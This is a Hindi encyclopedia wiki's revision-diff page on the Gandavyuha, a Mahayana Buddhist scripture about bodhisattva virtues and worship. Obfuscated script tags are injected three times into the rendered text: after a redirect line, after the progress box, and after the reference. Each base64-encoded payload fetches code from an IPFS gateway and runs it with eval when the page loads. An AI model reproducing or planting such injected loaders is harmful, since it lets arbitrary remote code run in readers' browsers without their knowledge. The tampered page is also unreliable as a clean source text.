Difference between revisions of "गंडव्यूह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गंडव्यूह''' बौद्ध महायान संप्रदाय का एक मह...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
'''गंडव्यूह''' [[महायान|बौद्ध महायान संप्रदाय]] का एक महत्वपूर्ण ग्रंथ है। इसमें [[बोधिसत्व]] का गुणगान और उनकी उपासना की चर्चा है। इस [[ग्रंथ]] के संबंध में अनुश्रुति है कि एक दिन भगवान्‌ बुद्ध [[श्रावस्ती]] स्थित [[जेतवन विहार|जेतवन]] में विहार कर रहे थे,तब उनके साथ सामंत भद्र, [[मंजुश्री]] आदि पाँच हजार बोधिसत्व थे। उन्होंने बुद्ध से ज्ञान प्रदान करने की प्रार्थना की। तब बुद्ध ने बोधिसत्व की उपासना के संबंध में बताया।<ref name="nn">{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%97%E0%A4%82%E0%A4%A1%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A5%82%E0%A4%B9|title=गंडव्यूह|accessmonthday=6 अगस्त|accessyear=2015|last= |first= |authorlink= |format= |publisher=भरतखोज |language=हिन्दी}}</ref>
+
'''गंडव्यूह''' [[महायान|बौद्ध महायान संप्रदाय]] का एक महत्वपूर्ण [[ग्रंथ]] है। इसमें [[बोधिसत्व]] का गुणगान और उनकी उपासना की चर्चा है।
*इस ग्रंथ में [[बोधिसत्व]] के लक्षण कहे गए हैं।
+
 
*बोधिसत्व प्राप्ति के निमित्त जो कुछ करणीय हैं वह बताया गया है।  
+
*इस [[ग्रंथ]] के संबंध में अनुश्रुति है कि एक दिन [[बुद्ध|भगवान बुद्ध]] [[श्रावस्ती]] स्थित [[जेतवन विहार|जेतवन]] में विहार कर रहे थे, तब उनके साथ सामंत भद्र, [[मंजुश्री]] आदि पाँच हज़ार बोधिसत्व थे। उन्होंने बुद्ध से ज्ञान प्रदान करने की प्रार्थना की। तब बुद्ध ने बोधिसत्व की उपासना के संबंध में बताया।<ref name="nn">{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%97%E0%A4%82%E0%A4%A1%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A5%82%E0%A4%B9|title=गंडव्यूह|accessmonthday=6 अगस्त|accessyear=2015|last= |first= |authorlink= |format= |publisher=भरतखोज |language=हिन्दी}}</ref>
*समस्त जीवों से प्रेम और करूणा करना, उनके दु:ख की निवृति के निमित्त प्रयत्न करना और जीवों को स्वर्ग मार्ग बताने के निमित्त उपदेश करना बोधिसत्व का कर्तव्य है।  
+
*गंडव्यूह ग्रंथ में [[बोधिसत्व]] के लक्षण कहे गए हैं।
*इस ग्रंथ के अंत में भद्रचारी प्रणिघात गाथा नामक एक स्त्रोत्र है। उसमें महायान पंथ के तत्वज्ञान के निमित्त बुद्ध की स्तुति है।  
+
*बोधिसत्व प्राप्ति के निमित्त जो कुछ भी करणीय हैं, वह गंडव्यूह में बताया गया है।
 +
*समस्त जीवों से प्रेम और करूणा करना, उनके दु:ख की निवृति के निमित्त प्रयत्न करना और जीवों को स्वर्ग मार्ग बताने के निमित्त उपदेश करना बोधिसत्व का कर्तव्य है।
 +
*इस ग्रंथ के अंत में 'भद्रचारी प्रणिघात गाथा' नामक एक स्त्रोत्र है। उसमें [[महायान|महायान पंथ]] के तत्वज्ञान के निमित्त बुद्ध की स्तुति है।  
 +
 
 +
 
 +
{{seealso|बौद्ध धर्म|बुद्ध|बुद्ध की शिक्षा|बौद्ध दर्शन|बौद्ध साहित्य}}
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 9: Line 14:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{बौद्ध साहित्य}}
+
{{बौद्ध साहित्य}}{{बौद्ध धर्म}}
{{बौद्ध धर्म}}
+
[[Category:बौद्ध दर्शन]][[Category:बौद्ध काल]][[Category:बौद्ध धर्म]][[Category:बौद्ध धर्म कोश]][[Category:हिन्दी विश्वकोश]][[Category:साहित्य कोश]]
[[Category:साहित्य कोश]][[Category:बौद्ध दर्शन]][[Category:बौद्ध काल]][[Category:बौद्ध धर्म]][[Category:बौद्ध धर्म कोश]][[Category:नया पन्ना][[Category:हिन्दी विश्वकोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 11:33, 6 August 2015

gandavyooh bauddh mahayan sanpraday ka ek mahatvapoorn granth hai. isamean bodhisatv ka gunagan aur unaki upasana ki charcha hai.

  • is granth ke sanbandh mean anushruti hai ki ek din bhagavan buddh shravasti sthit jetavan mean vihar kar rahe the, tab unake sath samant bhadr, manjushri adi paanch hazar bodhisatv the. unhoanne buddh se jnan pradan karane ki prarthana ki. tab buddh ne bodhisatv ki upasana ke sanbandh mean bataya.[1]
  • gandavyooh granth mean bodhisatv ke lakshan kahe ge haian.
  • bodhisatv prapti ke nimitt jo kuchh bhi karaniy haian, vah gandavyooh mean bataya gaya hai.
  • samast jivoan se prem aur karoona karana, unake du:kh ki nivriti ke nimitt prayatn karana aur jivoan ko svarg marg batane ke nimitt upadesh karana bodhisatv ka kartavy hai.
  • is granth ke aant mean 'bhadrachari pranighat gatha' namak ek strotr hai. usamean mahayan panth ke tatvajnan ke nimitt buddh ki stuti hai.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. gandavyooh (hindi) bharatakhoj. abhigaman tithi: 6 agast, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh